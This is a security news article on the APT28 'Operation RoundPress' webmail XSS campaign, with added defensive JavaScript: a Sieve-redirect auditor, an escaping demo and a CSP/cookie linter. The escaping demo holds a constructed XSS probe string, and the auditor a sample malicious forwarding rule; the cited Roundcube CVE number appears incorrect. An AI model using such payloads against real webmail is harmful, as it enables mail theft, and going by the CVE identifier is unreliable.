Kremlin Hackers Exploit Old XSS Flaws to Access Mail Servers

Security researchers at ESET have uncovered a sophisticated espionage campaign, dubbed Operation RoundPress, in which the Russian-linked hacking group Sednit (also known as APT28, Fancy Bear, Forest Blizzard, and Sofacy) used cross-site scripting (XSS) vulnerabilities—in some cases patched years ago—to infiltrate high-value webmail servers worldwide. The attackers exfiltrated contact lists and archived emails, and established persistent forwarding rules, compromising defense contractors and government entities across Europe, Africa, and South America.
1. Attack Overview
Between mid-2023 and early 2025, Sednit targeted four popular open-source and commercial mail platforms—Roundcube, MDaemon, Horde, and Zimbra—by embedding malicious JavaScript into spearphishing emails. When recipients using vulnerable webmail interfaces opened the poisoned messages, the script executed in their browser context, exploiting server-side XSS bugs to:
- Harvest address books and message archives via AJAX requests to attacker-controlled endpoints
- Create Sieve filtering rules that auto-forward incoming mail to Sednit-managed servers
- Maintain repeated code execution upon each email view, despite lacking host persistence
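The forwarding rules in the last bullet leave a durable trace on the server: a Sieve script in the victim's mailbox containing a redirect action. The JavaScript below is an added example, not code from ESET's report or from any of the mail platforms named, that audits such a script for redirect targets outside the organisation's own domain. The sample script, the trusted domain example.org and the function names are all assumptions made for this illustration.

```javascript
// Added example: flag Sieve redirect rules that forward mail outside the organisation.
// Not from ESET or any webmail vendor; the domain list and sample script are constructed.

const TRUSTED_DOMAINS = new Set(["example.org"]); // assumed organisational domain

// Constructed sample script: a catch-all redirect hiding behind a harmless-looking
// comment, an ordinary fileinto rule, and a legitimate internal redirect.
const SAMPLE_SIEVE = `
require ["fileinto", "copy"];
# Keep a backup copy of everything
if true {
    redirect :copy "backup-mail@external-relay.example.net";
}
if address :is "from" "hr@example.org" {
    fileinto "HR";
}
if header :contains "subject" "[delegate]" {
    redirect "assistant@example.org";
}
`;

// Drop '#' line comments so commented-out text is neither flagged nor able to hide a rule.
// (A '#' inside a quoted string would also be cut; acceptable for an audit, not for a parser.)
function stripComments(script) {
  return script.split("\n").map(line => line.replace(/#.*$/, "")).join("\n");
}

// Every target address of a redirect action, with or without the :copy modifier.
function findRedirects(script) {
  const re = /\bredirect\b(?:\s+:copy)?\s+"([^"]+)"/g;
  const targets = [];
  let m;
  while ((m = re.exec(stripComments(script))) !== null) targets.push(m[1]);
  return targets;
}

// Redirect targets whose domain is not trusted (or that have no domain at all).
function suspiciousForwards(script, trusted = TRUSTED_DOMAINS) {
  return findRedirects(script).filter(addr => {
    const at = addr.lastIndexOf("@");
    if (at < 0) return true; // malformed target: worth a look
    return !trusted.has(addr.slice(at + 1).toLowerCase());
  });
}

console.log("suspicious forwards:", suspiciousForwards(SAMPLE_SIEVE));
```

In practice this runs over every user's active Sieve script as the mail server stores it, on a schedule, and any new external redirect is alerted on and compared against a baseline snapshot. Forwarding configured through the webmail's own settings pages rather than Sieve needs a separate check against that platform's preference store.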
2. Technical Deep Dive: Anatomy of the XSS Exploit
Cross-site scripting arises when untrusted input is improperly sanitized and reflected or stored by a web application. In Operation RoundPress, Sednit used two primary XSS vectors:
- Reflected XSS in Roundcube (CVE-2020-43770): Malicious parameters embedded in a crafted URL within the email HTML triggered unsafe innerHTML assignments in the mail viewer component. On rendering, the browser executed the attacker’s payload.
- Stored XSS in MDaemon (zero-day exploited in late 2023): An unchecked HTML tag inserted into the “message preview” module persisted in the server database. When a user browsed their inbox, the server returned the malicious script embedded in the page.
All exploited vulnerabilities shared a common failure: lack of context-sensitive escaping of HTML attributes or inner content. Modern frameworks mitigate XSS by default via mechanisms like Content Security Policy (CSP) and templating engines (e.g., React’s JSX escaping), but legacy mail platforms often predate these safeguards.
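To make the “lack of context-sensitive escaping” failure concrete, here is an added JavaScript example, written for this page rather than taken from Roundcube, MDaemon or any other project. It renders a message subject into a preview fragment the way the vulnerable viewers did (concatenating straight into markup) and the way a hardened viewer does (escaping each interpolation for the context it lands in). The template, the helper names and the test subject are assumptions.

```javascript
// Added example: the same untrusted subject string rendered by plain concatenation
// (the pattern behind the exploited bugs) and by context-aware escaping.
// Not code from Roundcube, MDaemon or any other project; template and names are assumed.

// Constructed test subject of the kind used to probe for XSS: it tries to close the
// title attribute, add an event handler, and then inject a tag into the text node.
const HOSTILE_SUBJECT = `Invoice" onmouseover="alert(1)"><img src=x onerror=alert(1)>`;

// Escape for an HTML text node (and, because the template always double-quotes
// attributes, for a double-quoted attribute value too). '&' must be replaced first.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// 'Before': the subject lands in an attribute and in a text node with no encoding,
// which is exactly the failure the paragraph above describes.
function renderPreviewUnsafe(subject) {
  return `<div class="preview" title="${subject}">${subject}</div>`;
}

// 'After': each interpolation site is escaped for the context it sits in. The attribute
// site is only safe because the template itself supplies the surrounding double quotes.
function renderPreviewSafe(subject) {
  return `<div class="preview" title="${escapeHtml(subject)}">${escapeHtml(subject)}</div>`;
}

// --- small structural checks, good enough for a unit test on template output ---

// All tags in a fragment, as matched by a simple (non-parsing) scan.
function tagsIn(html) {
  return html.match(/<\/?[a-z][^>]*>/gi) || [];
}

// Tags other than the <div> the template is supposed to emit.
function foreignTags(html) {
  return tagsIn(html).filter(t => !/^<\/?div\b/i.test(t));
}

// Attribute names of an opening tag, ignoring double-quoted values so that escaped
// text inside a value (e.g. "&quot; onmouseover=&quot;") is not mistaken for an attribute.
function attributeNames(openTag) {
  return openTag
    .replace(/^<\w+/, "")
    .replace(/>$/, "")
    .replace(/="[^"]*"/g, "")
    .trim()
    .split(/\s+/)
    .filter(Boolean);
}

console.log("unsafe fragment adds:", foreignTags(renderPreviewUnsafe(HOSTILE_SUBJECT)));
console.log("safe fragment adds:  ", foreignTags(renderPreviewSafe(HOSTILE_SUBJECT)));
```

The point of the two contexts is that the escaper alone is not the whole fix: the attribute site stays safe only while the template always emits the quotes itself, and a URL context (an href built from a sender address, say) would need a scheme allow-list rather than entity encoding. An HTML-body renderer for email, which has to keep some markup, cannot rely on escaping at all and needs an allow-list sanitizer such as DOMPurify in front of innerHTML.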
3. Historical Context and Evolution of XSS Threats
XSS first grabbed headlines in 2005 with the Samy Worm, which propagated across MySpace by injecting client-side JavaScript that added users as friends. Over the next decade, XSS remained one of the top three web exploit classes tracked by OWASP. As server-side frameworks matured and client browsers implemented stricter SameSite cookie defaults and CSP headers, XSS incidents declined—but did not vanish.
Operation RoundPress demonstrates that aging infrastructure and delayed patch cycles can resurrect dormant threats. ESET’s telemetry shows a 15% uptick in targeted XSS campaigns against enterprise webmail since Q4 2024, often coinciding with geopolitical flashpoints.
4. Impact and Target Profile
Key victims included defense subcontractors in Bulgaria and Romania manufacturing Soviet-era air defense systems, plus various government ministries in the EU, West Africa, and Brazil. Exfiltrated data likely fed Russian military intelligence, aiding operations in Ukraine and enabling surveillance of diplomatic communications.
5. Mitigation Strategies and Best Practices
- Patch Management: Apply vendor security updates promptly. Many exploited CVEs had fixes available for over 18 months.
- Content Security Policy (CSP): Implement a strict CSP that restricts allowable script sources (e.g., script-src 'self').
- HTTP-Only & SameSite Cookies: Ensure session cookies are inaccessible to JavaScript and blocked on cross-site requests.
- Input Validation & Escaping: Adopt context-aware escaping libraries (e.g., OWASP Java Encoder, PHP’s htmlspecialchars) throughout webmail codebases.
- Regular Code Audits: Perform periodic static and dynamic analysis using tools like Burp Suite and OWASP ZAP to catch regressions.
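The CSP and cookie items in this list can be checked mechanically against what a deployment actually sends. The JavaScript below is an added example, not ESET's or any vendor's code, that lints a Content-Security-Policy value and a Set-Cookie value for the weak settings named above. The header strings, the cookie name and the “strict” baseline policy are constructed for illustration; a real webmail may need broader img-src or connect-src entries.

```javascript
// Added example: lint CSP and Set-Cookie headers for the weaknesses listed above.
// Not ESET's or a vendor's code; all header values below are constructed samples.

// Constructed samples: a permissive policy and one reasonable strict baseline.
const WEAK_CSP = "default-src 'self'; script-src 'self' 'unsafe-inline' https://cdn.example.com";
const STRICT_CSP = "default-src 'none'; script-src 'self'; style-src 'self'; img-src 'self' data:; " +
  "connect-src 'self'; object-src 'none'; base-uri 'self'; frame-ancestors 'none'";
const WEAK_COOKIE = "webmail_session=abc123; Path=/";                                 // constructed
const GOOD_COOKIE = "webmail_session=abc123; Path=/; Secure; HttpOnly; SameSite=Lax"; // constructed

// Parse "dir src src; dir src" into Map<directive, [sources]> (tokens lower-cased).
function parseCsp(header) {
  const directives = new Map();
  for (const part of header.split(";")) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length) directives.set(tokens[0].toLowerCase(), tokens.slice(1).map(t => t.toLowerCase()));
  }
  return directives;
}

// Findings about script execution; an empty array means nothing obvious is wrong.
function lintCsp(header) {
  if (!header) return ["no Content-Security-Policy header"];
  const d = parseCsp(header);
  const findings = [];
  // script-src falls back to default-src; with neither, scripts may load from anywhere.
  const scriptSrc = d.get("script-src") || d.get("default-src");
  if (!scriptSrc) return ["neither script-src nor default-src set: any script origin allowed"];
  if (scriptSrc.includes("'unsafe-inline'")) findings.push("script-src allows 'unsafe-inline': injected inline script runs");
  if (scriptSrc.includes("'unsafe-eval'")) findings.push("script-src allows 'unsafe-eval'");
  if (scriptSrc.includes("*") || scriptSrc.some(s => s.startsWith("http:"))) findings.push("script-src allows a wildcard or plain-http origin");
  const objectSrc = d.get("object-src") || d.get("default-src");
  if (!objectSrc || !objectSrc.includes("'none'")) findings.push("object-src not 'none': plugin content can execute");
  return findings;
}

// Findings for one Set-Cookie value: the attributes that keep a session cookie out of
// reach of injected script and off cross-site requests.
function lintSetCookie(header) {
  const [pair, ...rest] = header.split(";");
  const name = pair.split("=")[0].trim();
  const attrs = rest.map(a => a.trim().toLowerCase());
  const findings = [];
  if (!attrs.includes("httponly")) findings.push(`${name}: missing HttpOnly (document.cookie can read it)`);
  if (!attrs.includes("secure")) findings.push(`${name}: missing Secure`);
  const sameSite = attrs.find(a => a.startsWith("samesite="));
  if (!sameSite || sameSite === "samesite=none") findings.push(`${name}: SameSite missing or None`);
  return findings;
}

for (const [label, csp] of [["weak csp", WEAK_CSP], ["strict csp", STRICT_CSP]]) console.log(label, lintCsp(csp));
for (const cookie of [WEAK_COOKIE, GOOD_COOKIE]) console.log(lintSetCookie(cookie));
```

Feed it the headers from a `curl -sI` against the login page and from a logged-in response. Two caveats worth keeping in mind: script-src 'self' only helps while nothing attacker-controlled is served from the same origin, so attachments and inline images belong on a separate origin or behind a sandboxed response; and HttpOnly prevents cookie theft but not requests that injected script makes from inside the already-authenticated session, which is precisely how the address-book harvesting in section 1 works. These settings shrink the blast radius; only the patch removes the bug.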
6. Expert Opinions
“XSS remains a silent killer for legacy web applications,” says Dr. Elena Petrova, Senior Researcher at the University of Oxford’s Cyber Security Centre. “CSP and modern frameworks help, but organizations must still treat patching as a continuous process, not a one-time event.”
“We advise enterprises to adopt a multi-layered defense strategy,” adds James Wu, CTO of SecureWave Labs. “Combine runtime application self-protection (RASP) with secure coding training for developers.”
7. Conclusion
Operation RoundPress is a sobering reminder that even well-known exploits can inflict significant damage when defenses lapse. As mail infrastructures age and threat actors adapt, organizations must invest in proactive security hygiene—ultimately treating every patch like a potential bullet dodged.